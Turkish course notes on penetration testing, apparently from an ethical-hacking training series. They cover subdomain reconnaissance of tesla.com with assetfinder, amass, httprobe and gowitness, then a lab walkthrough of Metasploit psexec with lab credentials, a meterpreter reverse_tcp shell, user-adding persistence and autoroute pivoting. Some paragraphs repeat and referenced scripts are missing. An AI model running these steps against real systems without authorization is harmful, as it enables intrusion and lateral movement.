Bütün gördüğümüz tooları otomatik şekilde (yüklüyse) çalıştırmak için kullanabileceğimiz bash script kodu ise şu adresten indirip kullanabiliriz.
https://github.com/Gr1mmie/sumrecon/blob/master/sumrecon.sh
Bütün gördüğümüz tooları otomatik şekilde (yüklüyse) çalıştırmak için kullanabileceğimiz bash script kodu ise şu adresten indirip kullanabiliriz.
https://github.com/Gr1mmie/sumrecon/blob/master/sumrecon.sh
Go diliyle yazılmış iwitness toolunun bir benzeridir. https://github.com/sensepost/gowitness Buradaki adresten indirip kuracağız. Daha sonra bu sublist domainlere tek tek bakıp onlardan screenshot almamızı sağlayacak. Çalıştırıp liste şeklinde veridiğimizde ise bütün subdomainlere tek tek gidip ss alacak. Tek bir domainin ss’ini almak için
gowitness single –url=https://tesla.com
şeklinde çalıştırabiliriz.
Listelediğimiz subdomainlerin hangilerinin çalışıp çalışmadığını kontrol etmemizi sağlayan tool.
go get -u github.com/tomnomnom/httprobe
Bu komutla yüklüyoruz.
cat tesla.com/recon/final.txt | httprobe -s -p https:443
Yazarak daha önceki sublister’lardan edindiğimiz bilgiyle listenin tamamına http ve https istek atabiliriz. https:443 ile default https i 443 yapıyoruz.
cat tesla.com/recon/final.txt | httprobe -s -p https:443 sed ‘s/https\?:\/\///’ | tr -d ‘:443’ bunu çalıştırdığımızda tek seferde subdomainlerin başındaki ve sonundaki fazlalıkları atıp öyle gösterir.Son shell scriptimizi aynı olanları atacak sort -u (unique) komutunu ekleyerek şu hale getirip çalıştırabiliriz :
Amass aynı zamanda subdomain hunting için kullanılır. Bu adresteki from source yükleme yöntemini kullancağız.
https://github.com/OWASP/Amass
Bunun için de şu komutları çalıştırıyoruz :
amass enum -d tesla.com komutuyla çalıştırabiliriz. Bunun için bash scripti de şöyle yazabiliriz :
assetfinder subdomain bulmak için oldukça başarılı bir tooldur. Go yüklü olduğu için terminalden şu komutu çalıştırdığımızda tool otomatik olarak yüklenecek :
go get -u github.com/tomnomnom/assetfinder
assetfinder tesla.com dediğimiz sub domainleri kolayca bulur.
assetfinder –subs-only tesla.com
yazdığımızda da sadece o siteyle ilgili subları bulur.
Buradaki bash scripte ise scripti çalıştırmak için öncelikle argüman alıyoruz. Daha sonra birinci if ile eğer o isimde bir klasör yoksa klasör oluşturuyoruz. Sonra da o klasörün altında recon isimli bir klasör yoksa o klasörü oluşturuyoruz. Daha sonra da assetfinder çalıştırıyoruz ve çıkmızı açıp onun içinden grep komutu ile tesla.com barındıranları ayrı bir dosya olarak kayıt ediyoruz. En son da eski dosyayı rm ile siliyoruz. Daha sonra dosyayı executeble hale getirmek için
chmod +c run.sh
komutunu yazıp sonra da
./run.sh tesla.com
komutunu çalıştırıyoruz.
Bazı araçlarda go ya ihtiyaç duyacağımız için go indirip kuruyoruz. Go indirip tar’dan çıkartıyoruz. Daha sonra bu directory’nin kullanıcı türünü değiştirmek gerekiyor. Bunun için
chown -R root:root /usr/local/go
Komutunu yazıyoruz. Daha sonra path’lerin doğru olup olmadığını kontrol etmemiz gerekiyor. Bunun için gedit ~/.profile yazıp aşağıdaki gibi düzenliyoruz.
Güncellemek için daha sonra . ~./profile komutunu çalıştırıyoruz. echo $PATH yazınca doğru path görmeliyiz. Daha sonra da tooları kurmaya başlayacağız.
File transfer için bunlar haricinde metasploit de vardır. Ftp yoluyla file upload download yapmayı sağlar.
Makineye kullanıcı ekleyip shell sağlayabiliriz. Diğer seçeneklerde ise makineye yeni bir port açarız ve bu portların herhangi bir kontrol mekanizması yoktur bu yüzden çok tehlikelidir. Ama kullanıcı eklersek makine kapansa bile açıldığında shelli kontrol edip tekrar çalıştırabiliriz.
Pivot işlemini yapmak için Windows 10 makinelerimizi kapatıyoruz. Bir makine bir networke bağlı olduğuna o makineyi ele geçirince network yardımıyla diğer makinelere de ulaşabiliriz.
????? ===> Lab kurulumu için lab setup videosunu izle ?????
Makineler hazır olduktan sonra msfconsole yazıp metsploit başlatıyoruz.
Daha sonra use exploit/windows/smb/psexec yazıyoruz daha sonra options yazıp seçeneklerine bakacağız. Rhosts belirliyoruz. smbdomaine marvel/local yazıyoruz. Bu active directory’deki domain adımız. set smbpass password1 ve set smbuser fcastle yazıyoruz böylece makinenin kullanıcı adı şifresini de set etmiş oluyoruz. Bunların hepsi active diretory derslerinde kullandığımız bilgiler. set payload windows/x64/meterpreter/reverse_tcp diyoruz. set lhost eth0 diyoruz ve herşeyi set etmiş oluyoruz. set target 2 diyoruz ve run ediyoruz. Ve shell elde etmiş oluyoruz.
shell yazıp giriş yaptık
route print yazıp routingi görebiliriz.
arp -a yazarak haberleşen makineleri görebiliriz. Daha sonra
run autoroute -s 10.10.10.0/24 yazıp bu shell aldığımız makineden diğer makineye route kurmasını sağlıyoruz. Bu aşamada pivoting başlıyor.
Devamı pivoting derslerinde …